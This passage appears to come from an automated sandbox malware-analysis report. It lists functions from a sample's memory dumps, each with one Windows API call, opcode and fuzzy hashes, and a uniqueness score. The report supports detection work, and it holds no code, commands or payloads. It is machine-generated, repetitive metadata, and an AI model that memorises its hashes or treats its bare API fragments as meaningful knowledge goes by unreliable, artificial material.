RegSetValueExW.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A24A00

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a097d58f6ad77c62902294185e4d31f50d44df0251fdbf5dd3a00cd2041e9fd6
Instruction ID: 016a0309384102ad52d178b74fbd4ebe27473f41102189a6828d8e8622400124
Opcode Fuzzy Hash: a097d58f6ad77c62902294185e4d31f50d44df0251fdbf5dd3a00cd2041e9fd6
Instruction Fuzzy Hash: B611BF72500600AFEB21CF19DD41F67FFA8EF08710F14855BEE469A251D670E809DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A25820, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04A2588D

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0c4dacbd33ec940767215e205076b8f1c8cedfeb1e61013abb48d389d7934c74
Instruction ID: 855456339636c7f8162606474ba636357725f5d1562269f2ab44a2c6a4895485
Opcode Fuzzy Hash: 0c4dacbd33ec940767215e205076b8f1c8cedfeb1e61013abb48d389d7934c74
Instruction Fuzzy Hash: 7111AF755097C0AFDB128F25DC44A52BFB4EF06220F0984DEED858F163C265A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A20032, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A20091

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: b2551c7aa9ef6016eb8b0feb0fbb27e29a0167891e989ea0bd2025babca4fce2
Instruction ID: 6559878ef459ad3084b64ccc077bce4d9b524d2b2a238d80bf891fd640217623
Opcode Fuzzy Hash: b2551c7aa9ef6016eb8b0feb0fbb27e29a0167891e989ea0bd2025babca4fce2
Instruction Fuzzy Hash: D411EF71404200AFEB21CF58DD40F67FFA8EF04320F1488ABEE459B201C270A4089BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A24A52, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A24AB3

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6c08aa410ea02f3bb3a5664e9a919bc71daa9b9b8a7ca3fc717fab6deca7a07f
Instruction ID: fba52c9db165cae8f0d293b281f32952b14ccc6e42e642a810e7634c6175252c
Opcode Fuzzy Hash: 6c08aa410ea02f3bb3a5664e9a919bc71daa9b9b8a7ca3fc717fab6deca7a07f
Instruction Fuzzy Hash: 53119371509380AFD711CF29DC44B56BFE8EF46220F0984EAED45CF252D274A844DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A26792, Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A267EE

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 90cf5e8a66adbd1e911224e9e8ca871765a531f9cd4c4d12e8834cd5301a201b
Instruction ID: b09f7527f15c15df2c0662616d52cd3d91433d0c3001c29e781c64696e8c1e3c
Opcode Fuzzy Hash: 90cf5e8a66adbd1e911224e9e8ca871765a531f9cd4c4d12e8834cd5301a201b
Instruction Fuzzy Hash: 1511E371500200AFEB20CF19DD84F66FFA8EF44720F1484ABEE449B241D674A809DB71

Uniqueness

Uniqueness Score: -1.00%

Function 04A21066, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A210BF

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 00febc0b82b83d8f886e39f7018db9a779d231d4aa59b28a63c741a948c9a923
Instruction ID: da6f05f7806c4603e4d529966bb608150ce0336fbc64b8ec8cf8744d7eb59617
Opcode Fuzzy Hash: 00febc0b82b83d8f886e39f7018db9a779d231d4aa59b28a63c741a948c9a923
Instruction Fuzzy Hash: 0011E071504240AFEB20CF19DD85F67FBA8EF45320F1488ABEE489B241D674A8058BB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A25981, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04A259EC

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 8bf67ac45fd91829dcad58f7961c3c2d88a5d091958623a2a58c3cbab7ccdfc9
Instruction ID: c4a6d904eb6ac84654be4047b2f2d0a5c83aaae6b9e849108a87ab1a4c829f88
Opcode Fuzzy Hash: 8bf67ac45fd91829dcad58f7961c3c2d88a5d091958623a2a58c3cbab7ccdfc9
Instruction Fuzzy Hash: A8117C758093C0AFD7128F25DC84B61BFB4EF47624F0980DAED858F263D2656808DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A2577F, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A257E4

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: f7dabcf80aec7068d263652ee948f4c3c3254cf536d0f45819702320ed7a692b
Instruction ID: 204757808a0a4ca14174d79ef6286b2c50f70d221dfebe54f2abb70a76822075
Opcode Fuzzy Hash: f7dabcf80aec7068d263652ee948f4c3c3254cf536d0f45819702320ed7a692b
Instruction Fuzzy Hash: 49119D754093C0AFD7128B25DC94B52BFB4AF07224F19C0DBED858F2A3D265A909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A24472, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E2C), ref: 04A244DB

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 25aca4a2b9911b60c3eb79f93d860c995c449670e5b23f1cbe7386605372720e
Instruction ID: 691dc0a44efe08db593bc2ac668188b7128abe94fbe6b23b2c4db4f6d34ca4a7
Opcode Fuzzy Hash: 25aca4a2b9911b60c3eb79f93d860c995c449670e5b23f1cbe7386605372720e
Instruction Fuzzy Hash: 0E11E175500600AFE720DF19DD85FA6FFA8DF09720F14849AEE456B281D6B4B9098B71

Uniqueness

Uniqueness Score: -1.00%

Function 04A22F26, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A22F85

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 397992c4f6993f3d75961ea77f2a53dfbf5315f250319f8f89a328ff23115c96
Instruction ID: 521b9ed3e8efefbd32581d65f6fdd0c6dc63968492e2812d41f0a5450e471af2
Opcode Fuzzy Hash: 397992c4f6993f3d75961ea77f2a53dfbf5315f250319f8f89a328ff23115c96
Instruction Fuzzy Hash: 22110E32100600EFEB208F19CD84F66FFA8EF08320F14849BEE455B291D271A819DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04A214A4, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A21504

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 5ca9e105dd692dfbf83e3e23ebb92fa78f3717e316bf2e45fa457a6a67a21491
Instruction ID: 5eb3d01a1ee33a2532a40e09482fcd8e00e7417e98cf61737b998bd05f22f09d
Opcode Fuzzy Hash: 5ca9e105dd692dfbf83e3e23ebb92fa78f3717e316bf2e45fa457a6a67a21491
Instruction Fuzzy Hash: C0119071405380AFDB22CF54DC44A52FFF4EF46220F0888DEED858B162C375A918DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2301E, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetPerAdapterInfo.IPHLPAPI(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A23077

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AdapterInfo
String ID:
API String ID: 3405139893-0
Opcode ID: bc5bdc0a65d4fb8e64980318303a2f2a8341d6799520609babf2e13ab3c946e1
Instruction ID: 8c5e175d7725ef00a89662455b00b6d802d80a5044eeaa169171e4fae5d256a2
Opcode Fuzzy Hash: bc5bdc0a65d4fb8e64980318303a2f2a8341d6799520609babf2e13ab3c946e1
Instruction Fuzzy Hash: D5110471504204EFEB208F29DD84F66FFA8EF05320F1484ABEE445B241D6B4A809DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A23506, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,353CADAB,00000000,00000000,00000000,00000000), ref: 04A2355F

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: bc5bdc0a65d4fb8e64980318303a2f2a8341d6799520609babf2e13ab3c946e1
Instruction ID: e5b7587738cfa38aa059a83d21d38feba40120f7ab216a9fb7cbb74e65c331b5
Opcode Fuzzy Hash: bc5bdc0a65d4fb8e64980318303a2f2a8341d6799520609babf2e13ab3c946e1
Instruction Fuzzy Hash: DB11E571500204AFEB208F29CD44F66FBA8EF09720F18849BEE495B241D274B405DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 04A22847, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 04A228A9

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 38424ea3a5308414b564a01b102bb4957964a9934f6da7584a4b611fed538054
Instruction ID: e13ce883096e424706912d16cd96a5c0e63a3154d08539dc5ab1cdc0e255d4f2
Opcode Fuzzy Hash: 38424ea3a5308414b564a01b102bb4957964a9934f6da7584a4b611fed538054
Instruction Fuzzy Hash: D9118F72409384AFDB228F25DC44A52FFB4EF06220F0884DAED854B562D265A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 04A221CA, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 04A22215

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ExtentPoint32Text
String ID:
API String ID: 223599850-0
Opcode ID: daac6d6c446f4d333886f2f8ad2c11229a114a175585a00c3423d48d599b9278
Instruction ID: 3918f5f6dcfbc08230f9baf8f0422752eb445441bb39136f40d217dfa8061500
Opcode Fuzzy Hash: daac6d6c446f4d333886f2f8ad2c11229a114a175585a00c3423d48d599b9278
Instruction Fuzzy Hash: C4118E725002409FEB20CF69D984B66FFE8EF04320F08C8AADD499F612E675E804DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A23E02, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04A23E4E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: d600baa425388ee1756ef0b6cfb409ea5f6a8b9ec53ef4ffafdafba157621a78
Instruction ID: 1393f39dbfc88cc53f72af7cab3f81da8eff1a70c6dea3a0dcf95491a6f17049
Opcode Fuzzy Hash: d600baa425388ee1756ef0b6cfb409ea5f6a8b9ec53ef4ffafdafba157621a78
Instruction Fuzzy Hash: BE117071500644AFDB60CF69D944B52FFE4EF09310F0885AADE458B621D375E858EF61

Uniqueness

Uniqueness Score: -1.00%

Function 04A24A76, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A24AB3

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 48a5071fea324376b1e057d050790a89b1704e4a18a758fa2f16024f3098111e
Instruction ID: 072ac2dd16a1308f5d69eabc1851927cf943258f2b55e39645be865d48ced1da
Opcode Fuzzy Hash: 48a5071fea324376b1e057d050790a89b1704e4a18a758fa2f16024f3098111e
Instruction Fuzzy Hash: 5F019E71604200AFEB10CF29D984766FFE8EF08220F18C4AADD49CB242E6B5E804DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A256FE, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A25738

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 90efa6ff574023ad65295f9a04373f8acb12bb8e6b865f62b3ada7c5c268e4da
Instruction ID: 6ab7fb53757b57254c3f901337cd1fa9c451c4f9b1abade5d2c068ecc53c859e
Opcode Fuzzy Hash: 90efa6ff574023ad65295f9a04373f8acb12bb8e6b865f62b3ada7c5c268e4da
Instruction Fuzzy Hash: 6A019EB1A40240EFDB10CF29D984766FBE8EF40220F18C4AADD09CB256D674E808DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A2141E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04A2146E

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: eaa7a45544f5486de3c4529456d577a0c76ac62604adff3c01caced63d6a4248
Instruction ID: 8d6af465c35340a34dee40f4def353537dc815ffaaf5c3ecee7569174d6a9656
Opcode Fuzzy Hash: eaa7a45544f5486de3c4529456d577a0c76ac62604adff3c01caced63d6a4248
Instruction Fuzzy Hash: 7F017172500600ABD710DF16DC85F26FBA8EB88B20F14C56AED089B741E331B915CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04A2327E, Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E2C,?,?), ref: 04A232CE

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: be984d55f7db9cb0905ffa40a3efacb7cece0cf3d2f2f5b4f0c5a900f0ee8fd5
Instruction ID: e6cfb004acc97c9fdf81c1483cbe1a9e22ff80a34c5abaaa22be14872af76be5
Opcode Fuzzy Hash: be984d55f7db9cb0905ffa40a3efacb7cece0cf3d2f2f5b4f0c5a900f0ee8fd5
Instruction Fuzzy Hash: 2D017172500600ABD750DF16DC85F26FBA8EB88B20F14C56AED089B741E331B915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 04A2512A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04A2517A

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 3d7e6ea67ddde36db6653e7605ff30eede0d386b2dc57810699242dcac60398a
Instruction ID: 456957b23871077ec73af68543f141b483e13dbb537c72f149187061bf0cace1
Opcode Fuzzy Hash: 3d7e6ea67ddde36db6653e7605ff30eede0d386b2dc57810699242dcac60398a
Instruction Fuzzy Hash: 13017172500600ABD710DF16DC85F26FBA8EB88B20F14C56AED089B741E331B915CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04A21A9E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04A21AE9

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 9c6d6ae75050727f0c0e800c261ccdbc0568055a76adfdf201809878f964bc59
Instruction ID: 1eba0fe4add5f273d0623cb83ee75368326b881f1acabd16a71dd6bf89d02c70
Opcode Fuzzy Hash: 9c6d6ae75050727f0c0e800c261ccdbc0568055a76adfdf201809878f964bc59
Instruction Fuzzy Hash: 7C019E71600604AFDB20CF1AD984B22FFE8EF14720F18C5AADD498B202E271F408DB72

Uniqueness

Uniqueness Score: -1.00%

Function 04A214C6, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A21504

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 36ad92eb5da4dc26388ecbd220ccf2179f5cf44959fefa5974b48668fead6dd8
Instruction ID: 69dec193abfdce4cb5e3fffc4b733e7a04bd4787d24262676116e5a9bb7ce08f
Opcode Fuzzy Hash: 36ad92eb5da4dc26388ecbd220ccf2179f5cf44959fefa5974b48668fead6dd8
Instruction Fuzzy Hash: F2019E72500640EFDB20CF59E944B56FFE0EF08320F18C8AADE4A4B612D375A418EF62

Uniqueness

Uniqueness Score: -1.00%

Function 04A25646, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 04A25684

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 4846c5b81b8adb9e90468f04507936924aa475661c9f35e8e7e16ebfc3a26833
Instruction ID: 9813e28f646b9a2bb87645fe61d5a3b9d5c46f7a41dfb6c970728f5e3680a18a
Opcode Fuzzy Hash: 4846c5b81b8adb9e90468f04507936924aa475661c9f35e8e7e16ebfc3a26833
Instruction Fuzzy Hash: 42019E31900600AFDB218F59D944B66FFA0FF04320F08C4AADE864B651D6B5E918EF62

Uniqueness

Uniqueness Score: -1.00%

Function 04A201D6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetIfEntry.IPHLPAPI(?,00000E2C,?,?), ref: 04A20221

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: Entry
String ID:
API String ID: 3940594292-0
Opcode ID: f5bd33fe8639280f6079be39efcc92d3400b7f6cdc9f73c417d9c887ec4b1287
Instruction ID: 8bd7a6d53d2554cd44ffc3040d733e20d90134b9f3ed9e4f3a210bbb74024a59
Opcode Fuzzy Hash: f5bd33fe8639280f6079be39efcc92d3400b7f6cdc9f73c417d9c887ec4b1287
Instruction Fuzzy Hash: 39016D76500600ABD750DF1ADC86F26FBA8FB88B20F14815AED085B741E375F916CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 04A2210A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 04A2215A

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: ConnectionsEnum
String ID:
API String ID: 3832085198-0
Opcode ID: 207bfd2bddaa2be9baa6f75915c456cd26a9bb50fecf6ecd169235385a21d6d5
Instruction ID: 9b094c249f2bade2effb6ab4881c5f01dc726070d1cc13b0360a2743c3e9c2d0
Opcode Fuzzy Hash: 207bfd2bddaa2be9baa6f75915c456cd26a9bb50fecf6ecd169235385a21d6d5
Instruction Fuzzy Hash: 5D014F76500600ABD250DF16DC86F26FBA8EB88B20F14815AED085B741E371B916CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 04A25852, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 04A2588D

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d4917e8a3e7de93235d3f46562d26372b1a67e492319d21a2b6c0f279c15e644
Instruction ID: 9e4f7871bd0c1853ec235395bf2cbf294996e321133973fbb7607b074b277b1c
Opcode Fuzzy Hash: d4917e8a3e7de93235d3f46562d26372b1a67e492319d21a2b6c0f279c15e644
Instruction Fuzzy Hash: 37015E35900604EFDB248F59D984B66FFA4EF04321F08849ADE468A651D2B5A458EF62

Uniqueness

Uniqueness Score: -1.00%

Function 04A257B2, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,353CADAB,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04A257E4

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b212e31e8a466e6c9ffce9c6334a171ff94a69eeba2a4e0eb9ff8e23ece20041
Instruction ID: 95e2d075cafde3805f0689ceb6f66ebf7a917a38621f48eab50d59dc3b4149b9
Opcode Fuzzy Hash: b212e31e8a466e6c9ffce9c6334a171ff94a69eeba2a4e0eb9ff8e23ece20041
Instruction Fuzzy Hash: E401D175A00600EFD710CF19D984752FFA4EF04220F18C4AADD4A8B652D2B5E818EFB2

Uniqueness

Uniqueness Score: -1.00%

Function 04A2286E, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 04A228A9

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 066ed3661ae9259eca38c62fca136bcf9d9dda7692b69d0c1268940985382832
Instruction ID: 7f4b7a80cd5d214a4ca270ce16146362104a6425ed971832ac01f9868e0a82e5
Opcode Fuzzy Hash: 066ed3661ae9259eca38c62fca136bcf9d9dda7692b69d0c1268940985382832
Instruction Fuzzy Hash: 25014B36900644DFEB208F59D984B66FFE0EF08320F18C49ADE494B616D3B5E458EF62

Uniqueness

Uniqueness Score: -1.00%

Function 04A259BA, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 04A259EC

Memory Dump Source

Source File: 0000000A.00000002.330160641.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: d05be20745d54ccfccc65e3527bb3edd0d7d602fdf2a242314d0578402733eb9
Instruction ID: b66b50a37bdd7b94603024dcf7f598a544ee004e93cb64f188e87faa539d223c
Opcode Fuzzy Hash: d05be20745d54ccfccc65e3527bb3edd0d7d602fdf2a242314d0578402733eb9
Instruction Fuzzy Hash: 21F0AF34904654EFDB20CF1AD989762FFA0EF04320F18C0DADD495B616D2B5A808DE62

Uniqueness

Uniqueness Score: -1.00%

Function 065A13BE, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.340883404.00000000065A0000.00000040.00000001.sdmp, Offset: 065A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c6515b9d9faac7ec232748840bbf5b29cd65f5b5b28735378d990ac6a88b88
Instruction ID: a5d6ac2c4d168f7a8144d384fc4fd28027223219d4870e82e8b5f0f4ac059632
Opcode Fuzzy Hash: 05c6515b9d9faac7ec232748840bbf5b29cd65f5b5b28735378d990ac6a88b88
Instruction Fuzzy Hash: 5A21B4B5608341AFD340CF19D880A5BFBE4EB89660F14896EF99897311E275E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 065A1E30, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.340883404.00000000065A0000.00000040.00000001.sdmp, Offset: 065A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9cc70c7463a40d794d5be6d303f8a57353d2cd44194ab4f735e54ff0138c2d
Instruction ID: 2c116c90ccabdebdce3807252083aa4a9851ac3a2c0ef66f9287e931e37ac47e
Opcode Fuzzy Hash: 8b9cc70c7463a40d794d5be6d303f8a57353d2cd44194ab4f735e54ff0138c2d
Instruction Fuzzy Hash: 8511BAB5508301AFD340CF19D880A5BFBE4FB88664F14896EF998D7311D371EA048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 025D0724, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326872401.00000000025D0000.00000040.00000040.sdmp, Offset: 025D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ec239730742c9e07ac0d41c60f4ce724a8ca943c2046f77469dcf803e3bebd
Instruction ID: 22451b0ab96444a83f1b17d3d9cbcd6fda4ea414616652a8fdf4ef4eab99c488
Opcode Fuzzy Hash: 73ec239730742c9e07ac0d41c60f4ce724a8ca943c2046f77469dcf803e3bebd
Instruction Fuzzy Hash: DB216D3550D3C49FD7178B24C850B65BFB1AB47318F1985DED8889FAA3C33A9806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 025D075C, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.326872401.00000000025D0000.00000040.00000040.sdmp, Offset: 025D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a60a23d5e39c3dd42515e7af67afec0049549b934c0b4d3bc84ebf347a89500
Instruction ID: 95ac1607d5a80f22e06898eb9ce6a40b563da057936d93783e2a130df8f1a04a
Opcode Fuzzy Hash: 9a60a23d5e39c3dd42515e7af67afec0049549b934c0b4d3bc84ebf347a89500
Instruction Fuzzy Hash: 5011B434204244EFD725CB28C984B26BF95FB88718F24C99DE9495B693C777D803CE55

Uniqueness

Uniqueness Score: -1.00%

Function 065A1CD4, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.340883404.00000000065A0000.00000040.00000001.sdmp, Offset: 065A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c546992e9a61543c0de01b717b0eb5a23588274cc9bc999df01355439050e08c
Instruction ID: 8b1770d01c9e6f151024b2d527806d5f9aeb75a855ec52a0551667255ed52345
Opcode Fuzzy Hash: c546992e9a61543c0de01b717b0eb5a23588274cc9bc999df01355439050e08c
Instruction Fuzzy Hash: 2111BAB5608305AFD350CF19DC81E5BFBE8EB88660F14896EFD9997311D271E9048FA2

Uniqueness

Uniqueness Score: -1.00%

Function 025D05CF, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

